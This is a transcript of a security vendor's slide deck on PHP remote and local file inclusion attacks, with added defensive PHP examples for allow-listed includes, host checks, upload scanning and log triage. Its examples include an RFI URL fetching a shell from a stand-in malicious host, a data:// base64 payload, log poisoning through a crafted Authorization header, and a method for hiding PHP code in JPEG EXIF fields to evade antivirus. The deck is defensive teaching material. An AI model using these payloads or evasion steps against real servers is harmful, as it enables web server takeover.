How to Prevent RFI and LFI Attacks

Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker can take over a Web server. RFI and LFI attacks primarily affect Web applications written in the PHP programming language. PHP is the most popular server-side programming language. In fact, PHP is used by 77.2% of today’s Web sites. This presentation looks at how hackers use RFI/LFI and avoid traditional detection techniques.

Transcript

  • 1. How to Prevent Remote & Local File Inclusion Attacks. Tal Be’ery, Web Security Research Team Leader, Imperva
  • 2. Tal Be’ery, CISSP
    - Web Security Research Team Leader at Imperva
    - Holds MSc & BSc degrees in CS/EE from TAU
    - 10+ years of experience in the IS domain
    - Facebook “white hat”
    - Speaker at RSA, BlackHat, AusCERT
    © 2012 Imperva, Inc. All rights reserved.
  • 3. Contents
    - PHP Background and Internals
    - RFI Insight
      + Analysis of TimThumb shell “caught in the wild”
      + Advanced RFI using PHP streams and wrappers
    - LFI Insight
      + Innovative method for editing file content to embed PHP code and evade AV detection
      + Novel detection method
    - RFI and LFI in the Wild
      + New detection method using community-based reputation data
    - Questions and Answers
  • 4. RFI, LFI - Under the Radar
    - PHP is everywhere
    - Exploiting PHP’s include vulnerabilities with RFI/LFI attacks leads to full server takeover
    - Hackers are actively attacking organizations
      + TimThumb exploit reportedly compromised 1.2 million pages
    - And yet...
      + OWASP Top 10 in 2007 (#3)
      + Dropped in 2010
  • 5. Breadth and Depth of PHP
    - The most popular server-side programming language in the world!
  • 6. Breadth and Depth of PHP
    - Popular Web applications are powered by PHP
  • 7. PHP Internals - Parser HTML Mode
    - PHP’s parser starts in HTML mode
    - Ignores everything until it hits a PHP opening tag
      + Typically “<?php”, but also “<?”
    - PHP code is now parsed and compiled
    - When the parser hits a closing tag (“?>”), it drops back to HTML mode
    - Allows “mixed” coding
  • 8. PHP Internals - PHP Execution Steps
    - Parsing: code is converted into tokens (lexing); tokens are processed into meaningful expressions (parsing)
    - Compiling: derived expressions are converted into OpCodes
    - Execution: OpCodes are executed by the PHP engine
  • 9. PHP Internals - Disassembling with VLD
    - VLD (Vulcan Logic Disassembler) is a PHP extension
      + http://pecl.php.net/package/vld
      + Maintainers: Derick Rethans (lead)
    - Dumps the OpCodes of compiled PHP scripts
    - Code is compiled but not executed
  • 10. PHP Internals - VLD Analysis Demo
    - Compile
  • 11. PHP Internals - include()
    - The include() statement includes and evaluates the specified file
    - Used to share code by reference
    - PHP version >= 4.3
      + Remote files (http://) are valid include targets
    - The parser drops to HTML mode at the beginning of the included file
  • 12. And You Thought Eval() Is Evil...
    - Meet eval()’s hungry sister: include()
    - Not only does she evaluate arbitrary code
    - She eats everything before code
      + HTML mode: code can be prepended with anything (including binary content)
    - She loves dining out
      + Code can reside outside of the application
  • 13. RFI Exploitation
    - Simple vulnerable app for warm-up
    - Exploit:
      + http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
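The warm-up app of slide 13, written out as an added example (not the presentation's own code): the include that trusts the request, beside an allow-listed version and the php.ini settings that limit the blast radius. The file names under pages/ are assumptions.

```php
<?php
// Added example, not the presentation's code. Slide 13's warm-up app next to a
// hardened version. Page file names under pages/ are assumptions.

// Vulnerable: the include target is taken verbatim from the request.
// With allow_url_include=On this is RFI (?file=http://www.malicious.com/shell.txt);
// with it Off it is still LFI (?file=../../var/log/apache2/access.log).
function render_vulnerable(array $get): void {
    include $get['file'];
}

// Hardened: the request carries a key; the key maps to a fixed server-side path.
// No request bytes reach include(), so wrappers and traversal have nothing to act on.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(?string $key): ?string {
    return ($key !== null && array_key_exists($key, PAGES)) ? PAGES[$key] : null;
}

function render_hardened(array $get): void {
    // ?file[]=x would arrive as an array; only a string may be looked up.
    $key  = (isset($get['file']) && is_string($get['file'])) ? $get['file'] : null;
    $path = resolve_page($key);
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

// Every payload shape the deck discusses fails the exact-key test:
$probes = [
    'home',
    '../../../etc/passwd',
    'http://www.malicious.com/shell.txt',
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=',
];
foreach ($probes as $p) {
    printf("%-52s -> %s\n", $p, resolve_page($p) ?? 'rejected');
}

// Defence in depth in php.ini (slide 30: RFI is off by default since PHP 5.2):
//   allow_url_include = Off
//   allow_url_fopen   = Off        ; unless the application needs remote fopen()
//   open_basedir      = /var/www/app
```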
  • 14. RFI in the Wild
  • 15. Hacker Intel - Observations in the Wild
    - Hackers Intelligence Initiative (HII)
      + Initiated in 2010
      + Goes deep inside the cyber-underground and provides analysis of trending hacking techniques and attack campaigns in real time
      + Includes honeypots consisting of 40 Web applications
      + Analyzes security logs
  • 16. RFI in the Wild - TimThumb
    - TimThumb
      + A WordPress extension to produce thumbnails of images
      + Vulnerable to RFI
      + 1.2 million exploited pages
  • 17. TimThumb Exploit Analysis
    - Shell host: picasa.com.moveissantafe.com
      + Evaded the TimThumb filter that allowed inclusion only from a limited set of hosts
      + The implemented host check mistakenly allowed “picasa.com.moveissantafe.com” to pass as “picasa.com”
    - Started with a GIF file identifier, but then switched to encoded PHP
      + Evaded another TimThumb security filter used to verify that the file was indeed a valid picture
  • 18. TimThumb Exploit Analysis, Continued
    - Execution was controlled with additional HTTP parameters
      + LOL and OSC
  • 19.–21. TimThumb Exploit Analysis, Continued (same content as slide 18)
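Added example, not TimThumb's source: a host check with the weakness slide 17 describes (an allowed host accepted whenever the supplied host merely begins with it) beside a check that compares whole DNS labels and the URL scheme. The allow-list and the exact form of the weak comparison are assumptions.

```php
<?php
// Added example, not TimThumb's code. The weak comparison below is a guess at the
// class of bug slide 17 describes, not a transcription of TimThumb's source.

const ALLOWED_HOSTS = ['picasa.com', 'flickr.com'];   // assumed allow-list

// Weak: "picasa.com.moveissantafe.com" starts with "picasa.com", so it passes.
function host_allowed_weak(string $url): bool {
    $host = strtolower((string) parse_url($url, PHP_URL_HOST));
    foreach (ALLOWED_HOSTS as $allowed) {
        if (strpos($host, $allowed) === 0) return true;
    }
    return false;
}

// Hardened: exact match, or a subdomain separated from the allowed host by a dot
// ("www.picasa.com" passes, "picasa.com.moveissantafe.com" does not). Only
// http/https are accepted, which also shuts out the stream wrappers of slide 23.
function host_allowed_strict(string $url): bool {
    $parts = parse_url($url);
    if ($parts === false) return false;
    if (!in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) return false;
    $host = strtolower($parts['host'] ?? '');
    if ($host === '' || !preg_match('/^[a-z0-9.-]+$/', $host)) return false;
    foreach (ALLOWED_HOSTS as $allowed) {
        $suffix = '.' . $allowed;
        if ($host === $allowed || substr($host, -strlen($suffix)) === $suffix) return true;
    }
    return false;
}

$samples = [
    'http://picasa.com/image.jpg',
    'http://www.picasa.com/image.jpg',
    'http://picasa.com.moveissantafe.com/shell.txt',      // slide 17
    'data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=',  // slide 25
];
foreach ($samples as $url) {
    printf("%-52s weak=%-5s strict=%s\n", $url,
        host_allowed_weak($url) ? 'allow' : 'deny',
        host_allowed_strict($url) ? 'allow' : 'deny');
}
```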
  • 22. Advanced RFI with PHP Streams
  • 23. Advanced RFI with PHP Streams
    - Streams are a way of generalizing file, network, data compression, and other operations
    - Examples:
      + Accessing HTTP(S) URLs: http://, https://
      + Accessing FTP(S) URLs: ftp://, ftps://
      + Data (RFC 2397): data://
      + Accessing the local filesystem: file://
      + Accessing various I/O streams: php://
      + Compression streams: zlib://, bzip2://, zip://
  • 24. RFI PHP Streams
    - Hacker’s objective
      + Run the following code on the RFI-vulnerable app: <?php phpinfo(); ?>
    - Degree of difficulty
      + No shell hosting is allowed
    - Means
      + Bare hands
  • 25. RFI PHP Streams - Attack Example
    - base64(“<?php phpinfo()?>”) = "PD9waHAgcGhwaW5mbygpPz4="
    - Wrapped in the data wrapper:
      + "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4="
  • 26. RFI PHP Streams - Attack Example, Continued
  • 27. RFI PHP Streams - Attack Example, Continued
    - Mission Accomplished!
  • 28. PHP Streams - Why Hackers Use Them
    - To evade security filters
      + Many filters look only for exploits with the standard protocols
    - To hide the attack source
      + Shell URL obfuscation (compressed, base64)
    - To compromise without a hosted shell
      + Using the data wrapper
  • 29. Local File Inclusion
  • 30. LFI - Why Hackers Use It
    - LFI: malicious code must be stored locally
    - Extra work; why bother?
    - Because RFI is disabled by default
      + PHP version 5.2: allow_url_include = off
      + ~90% of PHP deployments are versions >= 5.2
  • 31. LFI - How to Be Local
    - Abuse existing file-write functionality within the server: log files
    - Abuse file upload functionality to embed malicious code within the uploaded file
    - Let’s demo it...
  • 32. LFI - Attacking Logs
    - Hacker’s objective
      + Run the following code: <?php phpinfo(); ?>
    - Degree of difficulty
      + allow_url_include = off; code must be local
    - Means
      + Proxy (or any other way to edit HTTP headers)
  • 33. LFI - Attacking Logs Example
    - Authorization: Basic base64(user:pass)
    - = Authorization: Basic base64(<?php phpinfo()?>:123456)
    - = Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=
  • 34. LFI - Attacking Logs Example, Continued
  • 35. LFI - Attacking Logs Example, Continued
    - Mission Accomplished!
  • 36. LFI - Abusing Upload
    - Hacker’s objective
      + Upload a picture with known malicious code to create LFI
    - Degree of difficulty
      + Picture appearance must not change
      + AV must not detect the code
    - Means
      + Bare hands
  • 37. LFI - Abusing Upload Example: Initial PHP Code
    - <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
    - Prints FeeLCoMz twice
    - Found in the wild
    - Detected by AVs
  • 38. LFI - Abusing Upload Example: Embedding Code in Picture, Phase I
    - Picture: jpg format
    - Editing EXIF properties
  • 39. LFI - Abusing Upload Example: Embedding Code in Picture, Phase I
    - Picture: jpg format
    - Editing EXIF properties
    - Better... but not good enough!
  • 40. LFI - Abusing Upload Example: Embedding Code in Picture, Phase II
    - Let’s split the vector across two adjacent properties
  • 41. LFI - Abusing Upload Example: Embedding Code in Picture, Phase II
    - Let’s split the vector across two adjacent properties
    - Better... but not good enough!
  • 42. LFI - Abusing Upload Example: Embedding Code in Picture, Phase III
    - Now it gets personal
    - ClamAV signature: PHP.Hide-1:0:0:ffd8ffe0?0104a464946{-4000}3c3f706870(0d|20|0a)
    - 3c3f706870 is hex for <?php
    - Maybe changing the case will work...
  • 43. LFI - Abusing Upload Example, Recap
    - Hacker’s objective
      + Upload a picture with known malicious code to create LFI
    - Degree of difficulty
      + Picture appearance must not change
      + AV must not detect the code
  • 44. LFI - Abusing Upload Example, Recap (same content as slide 43)
  • 45. LFI - Abusing Upload Example, Recap
    - Hacker’s objective
      + Upload a picture with known malicious code to create LFI
    - Degree of difficulty
      + Picture appearance must not change
      + AV must not detect the code
    - Mission Accomplished!
  • 46. LFI - Abusing Upload - Why AV Fails
    - General-purpose AVs search only for malicious code
      + In the context of LFI exploit detection, we are OK with detecting files containing any PHP code
    - General-purpose AVs are built to find compiled malicious code
      + Finding malicious source code requires a different set of features and awareness of text-related evasions
  • 47. LFI - Abusive File Upload Misdetection
    - Anti-virus: we just witnessed how it fails at this task
    - Degenerate PHP parser: looks only for PHP begin/end tokens
      + Looks for short tags (<?.*?>): many false positives
    - Compile the uploaded file and check if it compiles
      + Even benign documents are (trivially) compiled
    - Run the file and see if it executes: hmm...
  • 48. LFI - Abusive Upload File Detection
    - VLD it!
      + Compile the file with VLD
      + Inspect the OpCodes
      + No execution
    - A file bearing no PHP code will yield only two OpCodes
      + ECHO: to print the non-PHP content
      + RETURN: to return after the “execution”
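Added example, not from the deck: the ClamAV pattern of slide 42 transcribed to a PCRE byte signature, beside a check that asks PHP's own lexer whether the upload compiles to anything beyond inline HTML (the question slide 48 answers with VLD's ECHO/RETURN pair, here without the VLD extension). The JFIF header and the sample payloads are constructed for the example.

```php
<?php
// Added example, not the presentation's code. Two ways to decide whether an
// uploaded "picture" carries PHP code: the byte pattern of slide 42 and a check
// against PHP's own lexer. The sample files are constructed, not real malware.

// Slide 42's ClamAV signature transcribed to PCRE (an assumption of this example;
// ClamAV itself is not invoked):
//   offset 0: ffd8ffe0 ?0 10 4a464946 {-4000} 3c3f706870 (0d|20|0a)
//   "?0" is a half-byte wildcard, {-4000} allows up to 4000 bytes of gap,
//   3c3f706870 is "<?php", followed by CR, space or LF.
function matches_php_hide_signature(string $bytes): bool {
    $nibble = '[\x00\x10\x20\x30\x40\x50\x60\x70\x80\x90\xA0\xB0\xC0\xD0\xE0\xF0]';
    $re = '/^\xFF\xD8\xFF\xE0' . $nibble . '\x10JFIF.{0,4000}?<\?php[\r \n]/s';
    return preg_match($re, $bytes) === 1;
}

// Lexer-based check. token_get_all() is the tokenizer PHP compiles with; a file
// that holds no code comes back as a single T_INLINE_HTML token, the counterpart
// of the ECHO + RETURN pair slide 48 sees in VLD output. Any other token means
// the parser left HTML mode and found something to compile; case, whitespace and
// comments do not matter to it. Keep short_open_tag=Off, or a stray "<?" inside
// binary data produces the false positives slide 47 mentions.
function contains_php_code(string $bytes): bool {
    $passive = [T_INLINE_HTML, T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    foreach (token_get_all($bytes) as $tok) {
        if (!(is_array($tok) && in_array($tok[0], $passive, true))) {
            return true;
        }
    }
    return false;
}

// A minimal JFIF header (FF D8 FF E0 00 10 "JFIF" ...) followed by the slide-37
// payload, once in lower case and once in mixed case.
const JFIF = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00";
$samples = [
    'plain jpeg' => JFIF . 'pixels only',
    'lower case' => JFIF . '<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>',
    'mixed case' => JFIF . '<?PHP /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>',
];
foreach ($samples as $name => $bytes) {
    printf("%-10s signature: %-4s lexer: %s\n", $name,
        matches_php_hide_signature($bytes) ? 'hit' : 'miss',
        contains_php_code($bytes) ? 'code' : 'none');
}
```

The byte signature hits only the lower-case sample; the lexer flags both code-bearing samples and leaves the plain header alone.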
  • 49. LFI - Abusive File Detection with VLD Demo
  • 50. RFI, LFI in the Wild
  • 51. RFI, LFI in the Wild
    - Very relevant
      + 20% of all Web application attacks
    - LFI is more prevalent than RFI
      + 90% of PHP deployments are of versions that do not allow RFI by default
  • 52. RFI in the Wild - Sources Analysis
    - Highly automated
    - Consistent attackers
  • 53. RFI in the Wild - Sources Analysis
    - Many sources attack more than one target
  • 54. RFI in the Wild - Shell Hosting URLs Analysis
    - Obtaining shell hosting URLs:
      1. Analyze the honeypot’s RFI security log entry: http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
      2. Download the shell: wget http://www.malicious.com/shell.txt
      3. Verify it’s a script, to refrain from false positives
  • 55. RFI in the Wild - Shell Hosting URLs Analysis
    - Some URLs are being used consistently
  • 56. RFI in the Wild - Shell Hosting URLs Analysis
    - Many shell URLs are used against more than one target
  • 57. A New Approach - Community-Based RFI Black Lists
    - Attack characteristics (source, shell URL)
      + Non-transient: stable for days
      + General: not confined to a single honeypot
    - By forming a community that shares RFI data we can create black lists
      + Attack sources
      + Attackers’ shell hosting URLs
    - Achieve better protection!
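Added example, not Imperva's tooling: triage of include-parameter values from a Web log in the spirit of slides 28, 54 and 57, classifying each value by the wrapper or traversal it carries and collecting the source and shell-URL entries a shared black list would hold. The log lines and addresses are constructed; downloading and verifying the shell (steps 2 and 3 of slide 54) stays with the analyst.

```php
<?php
// Added example, not Imperva's tooling. Triage of the include parameter in Web
// log entries (slides 28, 54, 57): classify each value by the wrapper or
// traversal it carries, then collect attack sources and shell-hosting URLs
// for a shared black list. Addresses and lines below are constructed.

$log = <<<'LOG'
198.51.100.7 GET /test.php?file=http://www.malicious.com/shell.txt
198.51.100.7 GET /test.php?file=http://www.malicious.com/shell.txt
203.0.113.9 GET /test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
203.0.113.9 GET /test.php?file=../../../../var/log/apache2/access.log
192.0.2.44 GET /test.php?file=about
LOG;

// The wrappers of slide 23. Only the first group fetches a hosted shell; the
// others are what filters that "look only for the standard protocols" miss.
const REMOTE_SCHEMES = ['http', 'https', 'ftp', 'ftps'];
const OTHER_SCHEMES  = ['data', 'file', 'php', 'zlib', 'bzip2', 'zip'];

function classify_include_value(string $value): string {
    if (preg_match('#^([a-z0-9+.-]+)://#i', $value, $m)) {
        $scheme = strtolower($m[1]);
        if (in_array($scheme, REMOTE_SCHEMES, true)) return 'rfi';
        if (in_array($scheme, OTHER_SCHEMES, true))  return 'rfi-wrapper:' . $scheme;
    }
    if (preg_match('#(^|/)\.\.(/|$)#', $value) || strpos($value, "\0") !== false) return 'lfi';
    return 'benign';
}

// Returns the flagged requests plus the two lists slide 57 proposes sharing.
function analyze_log(string $log): array {
    $hits = []; $sources = []; $shellUrls = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+\?(?:[^\s&]*&)*file=([^&\s]+)/', $line, $m)) continue;
        $src   = $m[1];
        $value = rawurldecode($m[2]);            // decode once; never re-decode
        $class = classify_include_value($value);
        if ($class === 'benign') continue;
        $hits[] = [$src, $class, $value];
        $sources[$src] = true;
        if ($class === 'rfi') $shellUrls[$value] = true;   // step 1 of slide 54; fetching
    }                                                      // and verifying are steps 2-3
    return ['hits' => $hits,
            'sources' => array_keys($sources), 'shell_urls' => array_keys($shellUrls)];
}

$report = analyze_log($log);
foreach ($report['hits'] as [$src, $class, $value]) printf("%-13s %-17s %s\n", $src, $class, $value);
print_r(['sources' => $report['sources'], 'shell_urls' => $report['shell_urls']]);
```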
  • 58. Additional Resources
  • 59. Hacker Intelligence Initiative
    - Subscribe to Imperva’s Hacker Intelligence Initiative (HII):
      + Sign up to stay informed on all the latest attacks and hacking techniques
    - Download HII RFI resources:
      + Report: Remote File Inclusion (RFI) Vulnerabilities 101
      + Infographic: Exploiting RFI Attacks 101
  • 60. Presentation Materials
    - Join Imperva’s LinkedIn group Data Security Direct for...
      + Post-presentation discussions
      + Answers to attendee questions
      + Link to presentation audio
      + Link to presentation slides
    - http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609
  • 61. www.imperva.com - CONFIDENTIAL -